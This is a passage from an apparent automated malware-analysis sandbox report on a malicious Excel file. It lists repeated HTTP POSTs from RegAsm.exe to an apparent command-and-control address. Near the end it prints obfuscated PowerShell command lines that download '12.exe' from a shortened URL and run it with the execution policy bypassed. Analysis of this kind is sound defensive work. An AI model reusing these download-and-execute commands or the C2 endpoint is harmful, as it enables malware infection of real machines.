                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:09.843837023 CET1150INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:08 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        60192.168.2.2249227185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:31.542985916 CET1221OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:31.697483063 CET1221INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:30 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        61192.168.2.2249228185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:31.903232098 CET1222OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:32.053069115 CET1223INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:31 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        62192.168.2.2249229185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:32.262785912 CET1223OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:32.426687956 CET1224INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:31 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        63192.168.2.2249230185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:32.647726059 CET1225OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:32.815516949 CET1225INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:31 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        64192.168.2.2249231185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:33.031393051 CET1226OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:33.190809965 CET1226INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:32 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        65192.168.2.2249232185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:33.398943901 CET1227OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:33.560619116 CET1228INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:32 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        66192.168.2.2249233185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:33.770155907 CET1229OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:33.939742088 CET1229INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:33 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        67192.168.2.2249234185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:34.165365934 CET1230OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:34.334827900 CET1230INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:33 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        68192.168.2.2249235185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:34.564013004 CET1231OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:34.721364021 CET1232INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:33 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        69192.168.2.2249236185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:34.935154915 CET1232OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:35.122327089 CET1233INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:34 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        7192.168.2.2249174185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:10.067265987 CET1151OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:10.236854076 CET1151INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:09 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        70192.168.2.2249237185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:35.342015982 CET1234OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:35.512182951 CET1234INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:34 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        71192.168.2.2249238185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:35.726449013 CET1235OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:35.894052029 CET1236INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:34 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        72192.168.2.2249239185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        73192.168.2.2249240185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        74192.168.2.2249241185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        75192.168.2.2249242185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        76192.168.2.2249243185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        77192.168.2.2249244185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        78192.168.2.2249245185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        79192.168.2.2249246185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        8192.168.2.2249175185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:10.499610901 CET1152OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:10.673142910 CET1153INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:09 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        80192.168.2.2249247185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        81192.168.2.2249248185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        82192.168.2.2249249185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        83192.168.2.2249250185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        84192.168.2.2249251185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        85192.168.2.2249252185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        86192.168.2.2249253185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        87192.168.2.2249254185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        88192.168.2.2249255185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        89192.168.2.2249256185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        9192.168.2.2249176185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:10.888135910 CET1153OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:11.065620899 CET1154INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:10 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        90192.168.2.2249257185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        91192.168.2.2249258185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        92192.168.2.2249259185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        93192.168.2.2249260185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        94192.168.2.2249261185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        95192.168.2.2249262185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        96192.168.2.2249263185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        97192.168.2.2249264185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        98192.168.2.2249265185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        99192.168.2.2249266185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        HTTPS Packets

                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                        Jan 5, 2021 19:05:20.849750996 CET104.22.0.232443192.168.2.2249165CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                        CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027

                                                                                        Code Manipulations

                                                                                        Statistics

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        Analysis Process: EXCEL.EXE PID: 2260 Parent PID: 584

                                                                                        General

                                                                                        Start time:19:04:38
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                        Imagebase:0x13f7f0000
                                                                                        File size:27641504 bytes
                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Analysis Process: cmd.exe PID: 2292 Parent PID: 2260

                                                                                        General

                                                                                        Start time:19:04:40
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                                                                                        Imagebase:0x4aa20000
                                                                                        File size:345088 bytes
                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate

                                                                                        Analysis Process: cmd.exe PID: 2372 Parent PID: 2260

                                                                                        General

                                                                                        Start time:19:04:40
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                                                                                        Imagebase:0x4aa20000
                                                                                        File size:345088 bytes
                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate

                                                                                        Analysis Process: cmd.exe PID: 2468 Parent PID: 2260

                                                                                        General

                                                                                        Start time:19:04:40
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                                                                                        Imagebase:0x4aa20000
                                                                                        File size:345088 bytes
                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate

                                                                                        Analysis Process: powershell.exe PID: 1324 Parent PID: 2292

                                                                                        General

                                                                                        Start time:19:04:41
                                                                                        Start date:05/01/2021
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                                                                                        Imagebase:0x13fe30000
                                                                                        File size:473600 bytes
                                                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        Analysis Process: powershell.exe PID: 2492 Parent PID: 2372

                                                                                        General

                                                                                        Start time:19:04:41
                                                                                        Start date:05/01/2021
